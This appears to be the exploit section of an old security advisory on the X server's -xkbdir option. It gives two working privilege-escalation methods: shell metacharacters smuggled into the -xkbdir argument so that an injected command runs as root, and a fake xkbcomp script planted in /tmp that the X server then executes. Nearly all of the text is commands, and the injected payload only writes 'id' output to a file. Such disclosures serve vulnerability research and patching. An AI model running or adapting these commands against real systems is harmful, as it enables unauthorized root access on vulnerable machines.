Exploit:

    1. xkbcomp is invoked using system() or popen()
       - any  shell metacharacters  included in  -xkbdir argument  are
         interpreted

        $ Xserver -xkbdir ':;id > /tmp/I_WAS_HERE;'
        [exit X server]
        $ grep root /tmp/I_WAS_HERE && echo 'Gotcha!'

    2. a user supplied instance of xkbcomp is invoked
       - xkbdir argument is used to build the path to the compiler

        $ cat > /tmp/xkbcomp
        #!/bin/sh
        id > /tmp/I_WAS_HERE
        [ctrl+d]
        $ chmod a+x /tmp/xkbcomp
        $ Xserver -xkbdir /tmp
        [X server executes /tmp/xkbcomp]